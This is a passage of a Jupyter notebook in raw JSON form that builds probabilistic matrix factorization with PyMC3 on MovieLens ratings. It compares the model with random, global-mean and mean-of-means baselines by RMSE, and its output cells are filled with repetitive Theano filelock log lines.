"fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(16, 4), sharey=True)\nmovie_means.nlargest(30).plot(kind=\"bar\", ax=ax1, title=\"Top 30 movies in data set\")\nmovie_means.nsmallest(30).plot(kind=\"bar\", ax=ax2, title=\"Bottom 30 movies in data set\");",
"_____no_output_____"
]
],
[
[
"Make sense to me. We now know there are definite popularity differences between the movies. Some of them are simply better than others, and some are downright lousy. Looking at the movie means allowed us to discover these general trends. Perhaps there are similar trends across users. It might be the case that some users are simply more easily entertained than others. Let's take a look.",
"_____no_output_____"
]
],
[
[
"user_means = data.groupby(\"userid\").rating.mean().sort_values()\n_, ax = plt.subplots(figsize=(16, 6))\nax.plot(np.arange(len(user_means)), user_means.values, \"k-\")\n\nax.fill_between(np.arange(len(user_means)), user_means.values, alpha=0.3)\nax.set_xticklabels(\"\")\n# 1000 labels is nonsensical\nax.set_ylabel(\"Rating\")\nax.set_xlabel(f\"{len(user_means)} average ratings per user\")\nax.set_ylim(0, 5)\nax.set_xlim(0, len(user_means));",
"_____no_output_____"
]
],
[
[
"We see even more significant trends here. Some users rate nearly everything highly, and some (though not as many) rate nearly everything negatively. These observations will come in handy when considering models to use for predicting user preferences on unseen movies.",
"_____no_output_____"
],
[
"## Methods\n\nHaving explored the data, we're now ready to dig in and start addressing the problem. We want to predict how much each user is going to like all of the movies he or she has not yet read.\n\n\n### Baselines\n\nEvery good analysis needs some kind of baseline methods to compare against. It's difficult to claim we've produced good results if we have no reference point for what defines \"good\". We'll define three very simple baseline methods and find the RMSE using these methods. Our goal will be to obtain lower RMSE scores with whatever model we produce.\n\n#### Uniform Random Baseline\n\nOur first baseline is about as dead stupid as you can get. Every place we see a missing value in $R$, we'll simply fill it with a number drawn uniformly at random in the range [1, 5]. We expect this method to do the worst by far.\n\n$$R_{ij}^* \\sim Uniform$$\n\n#### Global Mean Baseline\n\nThis method is only slightly better than the last. Wherever we have a missing value, we'll fill it in with the mean of all observed ratings.\n\n$$\\text{global_mean} = \\frac{1}{N \\times M} \\sum_{i=1}^N \\sum_{j=1}^M I_{ij}(R_{ij})$$\n\n$$R_{ij}^* = \\text{global_mean}$$\n\n#### Mean of Means Baseline\n\nNow we're going to start getting a bit smarter. We imagine some users might be easily amused, and inclined to rate all movies more highly. Other users might be the opposite. Additionally, some movies might simply be more witty than others, so all users might rate some movies more highly than others in general. We can clearly see this in our graph of the movie means above. We'll attempt to capture these general trends through per-user and per-movie rating means. We'll also incorporate the global mean to smooth things out a bit. So if we see a missing value in cell $R_{ij}$, we'll average the global mean with the mean of $U_i$ and the mean of $V_j$ and use that value to fill it in.\n\n$$\\text{user_means} = \\frac{1}{M} \\sum_{j=1}^M I_{ij}(R_{ij})$$\n\n$$\\text{movie_means} = \\frac{1}{N} \\sum_{i=1}^N I_{ij}(R_{ij})$$\n\n$$R_{ij}^* = \\frac{1}{3} \\left(\\text{user_means}_i + \\text{ movie_means}_j + \\text{ global_mean} \\right)$$\n",
"_____no_output_____"
]
],
[
[
"# Create a base class with scaffolding for our 3 baselines.\n\n\ndef split_title(title):\n \"\"\"Change \"BaselineMethod\" to \"Baseline Method\".\"\"\"\n words = []\n tmp = [title[0]]\n for c in title[1:]:\n if c.isupper():\n words.append(\"\".join(tmp))\n tmp = [c]\n else:\n tmp.append(c)\n words.append(\"\".join(tmp))\n return \" \".join(words)\n\n\nclass Baseline:\n \"\"\"Calculate baseline predictions.\"\"\"\n\n def __init__(self, train_data):\n \"\"\"Simple heuristic-based transductive learning to fill in missing\n values in data matrix.\"\"\"\n self.predict(train_data.copy())\n\n def predict(self, train_data):\n raise NotImplementedError(\"baseline prediction not implemented for base class\")\n\n def rmse(self, test_data):\n \"\"\"Calculate root mean squared error for predictions on test data.\"\"\"\n return rmse(test_data, self.predicted)\n\n def __str__(self):\n return split_title(self.__class__.__name__)\n\n\n# Implement the 3 baselines.\n\n\nclass UniformRandomBaseline(Baseline):\n \"\"\"Fill missing values with uniform random values.\"\"\"\n\n def predict(self, train_data):\n nan_mask = np.isnan(train_data)\n masked_train = np.ma.masked_array(train_data, nan_mask)\n pmin, pmax = masked_train.min(), masked_train.max()\n N = nan_mask.sum()\n train_data[nan_mask] = np.random.uniform(pmin, pmax, N)\n self.predicted = train_data\n\n\nclass GlobalMeanBaseline(Baseline):\n \"\"\"Fill in missing values using the global mean.\"\"\"\n\n def predict(self, train_data):\n nan_mask = np.isnan(train_data)\n train_data[nan_mask] = train_data[~nan_mask].mean()\n self.predicted = train_data\n\n\nclass MeanOfMeansBaseline(Baseline):\n \"\"\"Fill in missing values using mean of user/item/global means.\"\"\"\n\n def predict(self, train_data):\n nan_mask = np.isnan(train_data)\n masked_train = np.ma.masked_array(train_data, nan_mask)\n global_mean = masked_train.mean()\n user_means = masked_train.mean(axis=1)\n item_means = masked_train.mean(axis=0)\n self.predicted = train_data.copy()\n n, m = train_data.shape\n for i in range(n):\n for j in range(m):\n if np.ma.isMA(item_means[j]):\n self.predicted[i, j] = np.mean((global_mean, user_means[i]))\n else:\n self.predicted[i, j] = np.mean((global_mean, user_means[i], item_means[j]))\n\n\nbaseline_methods = {}\nbaseline_methods[\"ur\"] = UniformRandomBaseline\nbaseline_methods[\"gm\"] = GlobalMeanBaseline\nbaseline_methods[\"mom\"] = MeanOfMeansBaseline",
"_____no_output_____"
],
[
"num_users = data.userid.unique().shape[0]\nnum_items = data.itemid.unique().shape[0]\nsparsity = 1 - len(data) / (num_users * num_items)\nprint(f\"Users: {num_users}\\nMovies: {num_items}\\nSparsity: {sparsity}\")\n\ndense_data = data.pivot(index=\"userid\", columns=\"itemid\", values=\"rating\").values",
"Users: 943\nMovies: 1682\nSparsity: 0.9369533063577546\n"
]
],
[
[
"## Probabilistic Matrix Factorization\n\n[Probabilistic Matrix Factorization (PMF)](http://papers.nips.cc/paper/3208-probabilistic-matrix-factorization.pdf) [3] is a probabilistic approach to the collaborative filtering problem that takes a Bayesian perspective. The ratings $R$ are modeled as draws from a Gaussian distribution. The mean for $R_{ij}$ is $U_i V_j^T$. The precision $\\alpha$ is a fixed parameter that reflects the uncertainty of the estimations; the normal distribution is commonly reparameterized in terms of precision, which is the inverse of the variance. Complexity is controlled by placing zero-mean spherical Gaussian priors on $U$ and $V$. In other words, each row of $U$ is drawn from a multivariate Gaussian with mean $\\mu = 0$ and precision which is some multiple of the identity matrix $I$. Those multiples are $\\alpha_U$ for $U$ and $\\alpha_V$ for $V$. So our model is defined by:\n\n$\\newcommand\\given[1][]{\\:#1\\vert\\:}$\n\n$$\nP(R \\given U, V, \\alpha^2) = \n \\prod_{i=1}^N \\prod_{j=1}^M\n \\left[ \\mathcal{N}(R_{ij} \\given U_i V_j^T, \\alpha^{-1}) \\right]^{I_{ij}}\n$$\n\n$$\nP(U \\given \\alpha_U^2) =\n \\prod_{i=1}^N \\mathcal{N}(U_i \\given 0, \\alpha_U^{-1} \\boldsymbol{I})\n$$\n\n$$\nP(V \\given \\alpha_U^2) =\n \\prod_{j=1}^M \\mathcal{N}(V_j \\given 0, \\alpha_V^{-1} \\boldsymbol{I})\n$$\n\nGiven small precision parameters, the priors on $U$ and $V$ ensure our latent variables do not grow too far from 0. This prevents overly strong user preferences and item factor compositions from being learned. This is commonly known as complexity control, where the complexity of the model here is measured by the magnitude of the latent variables. Controlling complexity like this helps prevent overfitting, which allows the model to generalize better for unseen data. We must also choose an appropriate $\\alpha$ value for the normal distribution for $R$. So the challenge becomes choosing appropriate values for $\\alpha_U$, $\\alpha_V$, and $\\alpha$. This challenge can be tackled with the soft weight-sharing methods discussed by [Nowland and Hinton, 1992](http://www.cs.toronto.edu/~fritz/absps/sunspots.pdf) [4]. However, for the purposes of this analysis, we will stick to using point estimates obtained from our data.",
"_____no_output_____"
]
],
[
[
"import logging\nimport time\n\nimport scipy as sp\nimport theano\n\n# Enable on-the-fly graph computations, but ignore\n# absence of intermediate test values.\ntheano.config.compute_test_value = \"ignore\"\n\n# Set up logging.\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass PMF:\n \"\"\"Probabilistic Matrix Factorization model using pymc3.\"\"\"\n\n def __init__(self, train, dim, alpha=2, std=0.01, bounds=(1, 5)):\n \"\"\"Build the Probabilistic Matrix Factorization model using pymc3.\n\n :param np.ndarray train: The training data to use for learning the model.\n :param int dim: Dimensionality of the model; number of latent factors.\n :param int alpha: Fixed precision for the likelihood function.\n :param float std: Amount of noise to use for model initialization.\n :param (tuple of int) bounds: (lower, upper) bound of ratings.\n These bounds will simply be used to cap the estimates produced for R.\n\n \"\"\"\n self.dim = dim\n self.alpha = alpha\n self.std = np.sqrt(1.0 / alpha)\n self.bounds = bounds\n self.data = train.copy()\n n, m = self.data.shape\n\n # Perform mean value imputation\n nan_mask = np.isnan(self.data)\n self.data[nan_mask] = self.data[~nan_mask].mean()\n\n # Low precision reflects uncertainty; prevents overfitting.\n # Set to the mean variance across users and items.\n self.alpha_u = 1 / self.data.var(axis=1).mean()\n self.alpha_v = 1 / self.data.var(axis=0).mean()\n\n # Specify the model.\n logging.info(\"building the PMF model\")\n with pm.Model() as pmf:\n U = pm.MvNormal(\n \"U\",\n mu=0,\n tau=self.alpha_u * np.eye(dim),\n shape=(n, dim),\n testval=np.random.randn(n, dim) * std,\n )\n V = pm.MvNormal(\n \"V\",\n mu=0,\n tau=self.alpha_v * np.eye(dim),\n shape=(m, dim),\n testval=np.random.randn(m, dim) * std,\n )\n R = pm.Normal(\n \"R\", mu=(U @ V.T)[~nan_mask], tau=self.alpha, observed=self.data[~nan_mask]\n )\n\n logging.info(\"done building the PMF model\")\n self.model = pmf\n\n def __str__(self):\n return self.name",
"_____no_output_____"
]
],
[
[
"We'll also need functions for calculating the MAP and performing sampling on our PMF model. When the observation noise variance $\\alpha$ and the prior variances $\\alpha_U$ and $\\alpha_V$ are all kept fixed, maximizing the log posterior is equivalent to minimizing the sum-of-squared-errors objective function with quadratic regularization terms.\n\n$$ E = \\frac{1}{2} \\sum_{i=1}^N \\sum_{j=1}^M I_{ij} (R_{ij} - U_i V_j^T)^2 + \\frac{\\lambda_U}{2} \\sum_{i=1}^N \\|U\\|_{Fro}^2 + \\frac{\\lambda_V}{2} \\sum_{j=1}^M \\|V\\|_{Fro}^2, $$\n\nwhere $\\lambda_U = \\alpha_U / \\alpha$, $\\lambda_V = \\alpha_V / \\alpha$, and $\\|\\cdot\\|_{Fro}^2$ denotes the Frobenius norm [3]. Minimizing this objective function gives a local minimum, which is essentially a maximum a posteriori (MAP) estimate. While it is possible to use a fast Stochastic Gradient Descent procedure to find this MAP, we'll be finding it using the utilities built into `pymc3`. In particular, we'll use `find_MAP` with Powell optimization (`scipy.optimize.fmin_powell`). Having found this MAP estimate, we can use it as our starting point for MCMC sampling.\n\nSince it is a reasonably complex model, we expect the MAP estimation to take some time. So let's save it after we've found it. Note that we define a function for finding the MAP below, assuming it will receive a namespace with some variables in it. Then we attach that function to the PMF class, where it will have such a namespace after initialization. The PMF class is defined in pieces this way so I can say a few things between each piece to make it clearer.",
"_____no_output_____"
]
],
[
[
"def _find_map(self):\n \"\"\"Find mode of posterior using L-BFGS-B optimization.\"\"\"\n tstart = time.time()\n with self.model:\n logging.info(\"finding PMF MAP using L-BFGS-B optimization...\")\n self._map = pm.find_MAP(method=\"L-BFGS-B\")\n\n elapsed = int(time.time() - tstart)\n logging.info(\"found PMF MAP in %d seconds\" % elapsed)\n return self._map\n\n\ndef _map(self):\n try:\n return self._map\n except:\n return self.find_map()\n\n\n# Update our class with the new MAP infrastructure.\nPMF.find_map = _find_map\nPMF.map = property(_map)",
"_____no_output_____"
]
],
[
[
"So now our PMF class has a `map` `property` which will either be found using Powell optimization or loaded from a previous optimization. Once we have the MAP, we can use it as a starting point for our MCMC sampler. We'll need a sampling function in order to draw MCMC samples to approximate the posterior distribution of the PMF model.",
"_____no_output_____"
]
],
[
[
"# Draw MCMC samples.\ndef _draw_samples(self, **kwargs):\n kwargs.setdefault(\"chains\", 1)\n with self.model:\n self.trace = pm.sample(**kwargs)\n\n\n# Update our class with the sampling infrastructure.\nPMF.draw_samples = _draw_samples",
"_____no_output_____"
]
],
[
[
"We could define some kind of default trace property like we did for the MAP, but that would mean using possibly nonsensical values for `nsamples` and `cores`. Better to leave it as a non-optional call to `draw_samples`. Finally, we'll need a function to make predictions using our inferred values for $U$ and $V$. For user $i$ and movie $j$, a prediction is generated by drawing from $\\mathcal{N}(U_i V_j^T, \\alpha)$. To generate predictions from the sampler, we generate an $R$ matrix for each $U$ and $V$ sampled, then we combine these by averaging over the $K$ samples.\n\n$$\nP(R_{ij}^* \\given R, \\alpha, \\alpha_U, \\alpha_V) \\approx\n \\frac{1}{K} \\sum_{k=1}^K \\mathcal{N}(U_i V_j^T, \\alpha)\n$$\n\nWe'll want to inspect the individual $R$ matrices before averaging them for diagnostic purposes. So we'll write code for the averaging piece during evaluation. The function below simply draws an $R$ matrix given a $U$ and $V$ and the fixed $\\alpha$ stored in the PMF object.",
"_____no_output_____"
]
],
[
[
"def _predict(self, U, V):\n \"\"\"Estimate R from the given values of U and V.\"\"\"\n R = np.dot(U, V.T)\n n, m = R.shape\n sample_R = np.random.normal(R, self.std)\n # bound ratings\n low, high = self.bounds\n sample_R[sample_R < low] = low\n sample_R[sample_R > high] = high\n return sample_R\n\n\nPMF.predict = _predict",
"_____no_output_____"
]
],
[
[
"One final thing to note: the dot products in this model are often constrained using a logistic function $g(x) = 1/(1 + exp(-x))$, that bounds the predictions to the range [0, 1]. To facilitate this bounding, the ratings are also mapped to the range [0, 1] using $t(x) = (x + min) / range$. The authors of PMF also introduced a constrained version which performs better on users with less ratings [3]. Both models are generally improvements upon the basic model presented here. However, in the interest of time and space, these will not be implemented here.",
"_____no_output_____"
],
[
"## Evaluation\n\n### Metrics\n\nIn order to understand how effective our models are, we'll need to be able to evaluate them. We'll be evaluating in terms of root mean squared error (RMSE), which looks like this:\n\n$$\nRMSE = \\sqrt{ \\frac{ \\sum_{i=1}^N \\sum_{j=1}^M I_{ij} (R_{ij} - R_{ij}^*)^2 }\n { \\sum_{i=1}^N \\sum_{j=1}^M I_{ij} } }\n$$\n\nIn this case, the RMSE can be thought of as the standard deviation of our predictions from the actual user preferences.",
"_____no_output_____"
]
],
[
[
"# Define our evaluation function.\ndef rmse(test_data, predicted):\n \"\"\"Calculate root mean squared error.\n Ignoring missing values in the test data.\n \"\"\"\n I = ~np.isnan(test_data) # indicator for missing values\n N = I.sum() # number of non-missing values\n sqerror = abs(test_data - predicted) ** 2 # squared error array\n mse = sqerror[I].sum() / N # mean squared error\n return np.sqrt(mse) # RMSE",
"_____no_output_____"
]
],
[
[
"### Training Data vs. Test Data\n\nThe next thing we need to do is split our data into a training set and a test set. Matrix factorization techniques use [transductive learning](http://en.wikipedia.org/wiki/Transduction_%28machine_learning%29) rather than inductive learning. So we produce a test set by taking a random sample of the cells in the full $N \\times M$ data matrix. The values selected as test samples are replaced with `nan` values in a copy of the original data matrix to produce the training set. Since we'll be producing random splits, let's also write out the train/test sets generated. This will allow us to replicate our results. We'd like to be able to idenfity which split is which, so we'll take a hash of the indices selected for testing and use that to save the data.",
"_____no_output_____"
]
],
[
[
"# Define a function for splitting train/test data.\ndef split_train_test(data, percent_test=0.1):\n \"\"\"Split the data into train/test sets.\n :param int percent_test: Percentage of data to use for testing. Default 10.\n \"\"\"\n n, m = data.shape # # users, # movies\n N = n * m # # cells in matrix\n\n # Prepare train/test ndarrays.\n train = data.copy()\n test = np.ones(data.shape) * np.nan\n\n # Draw random sample of training data to use for testing.\n tosample = np.where(~np.isnan(train)) # ignore nan values in data\n idx_pairs = list(zip(tosample[0], tosample[1])) # tuples of row/col index pairs\n\n test_size = int(len(idx_pairs) * percent_test) # use 10% of data as test set\n train_size = len(idx_pairs) - test_size # and remainder for training\n\n indices = np.arange(len(idx_pairs)) # indices of index pairs\n sample = np.random.choice(indices, replace=False, size=test_size)\n\n # Transfer random sample from train set to test set.\n for idx in sample:\n idx_pair = idx_pairs[idx]\n test[idx_pair] = train[idx_pair] # transfer to test set\n train[idx_pair] = np.nan # remove from train set\n\n # Verify everything worked properly\n assert train_size == N - np.isnan(train).sum()\n assert test_size == N - np.isnan(test).sum()\n\n # Return train set and test set\n return train, test\n\n\ntrain, test = split_train_test(dense_data)",
"_____no_output_____"
]
],
[
[
"## Results",
"_____no_output_____"
]
],
[
[
"# Let's see the results:\nbaselines = {}\nfor name in baseline_methods:\n Method = baseline_methods[name]\n method = Method(train)\n baselines[name] = method.rmse(test)\n print(\"{} RMSE:\\t{:.5f}\".format(method, baselines[name]))",
"Uniform Random Baseline RMSE:\t1.67456\nGlobal Mean Baseline RMSE:\t1.13491\nMean Of Means Baseline RMSE:\t1.02368\n"
]
],
[
[
"As expected: the uniform random baseline is the worst by far, the global mean baseline is next best, and the mean of means method is our best baseline. Now let's see how PMF stacks up.",
"_____no_output_____"
]
],
[
[
"# We use a fixed precision for the likelihood.\n# This reflects uncertainty in the dot product.\n# We choose 2 in the footsteps Salakhutdinov\n# Mnihof.\nALPHA = 2\n\n# The dimensionality D; the number of latent factors.\n# We can adjust this higher to try to capture more subtle\n# characteristics of each movie. However, the higher it is,\n# the more expensive our inference procedures will be.\n# Specifically, we have D(N + M) latent variables. For our\n# Movielens dataset, this means we have D(2625), so for 5\n# dimensions, we are sampling 13125 latent variables.\nDIM = 10\n\n\npmf = PMF(train, DIM, ALPHA, std=0.05)",
"INFO:root:building the PMF model\nINFO:filelock:Lock 140478053917456 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478053917456 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055446032 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055446032 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478053980768 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478053980768 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056199504 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056199504 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056254336 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056254336 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054023952 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054023952 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054004288 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478054004288 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056201136 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056201136 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056116864 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478056116864 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055757376 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055757376 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055889216 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055889216 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055447232 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055447232 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066137456 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066137456 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067785888 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067785888 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067813200 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067813200 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079190208 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079190208 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067698416 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478067698416 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202256 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202256 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079365904 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079365904 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478065170800 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478065170800 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079299104 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079299104 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084149648 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084149648 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:root:done building the PMF model\n"
]
],
[
[
"### Predictions Using MAP",
"_____no_output_____"
]
],
[
[
"# Find MAP for PMF.\npmf.find_map();",
"INFO:root:finding PMF MAP using L-BFGS-B optimization...\nINFO:filelock:Lock 140478096967952 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096967952 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096969536 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096969536 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084029600 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084029600 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966752 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966752 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155600 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155600 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084028400 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084028400 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155648 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097155648 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478404843696 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478404843696 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094398704 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094398704 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096934704 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096934704 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094363664 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478094363664 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084066176 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084066176 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097622640 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097622640 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097481008 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097481008 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097597392 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097597392 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097086208 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097086208 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291968 acquired on 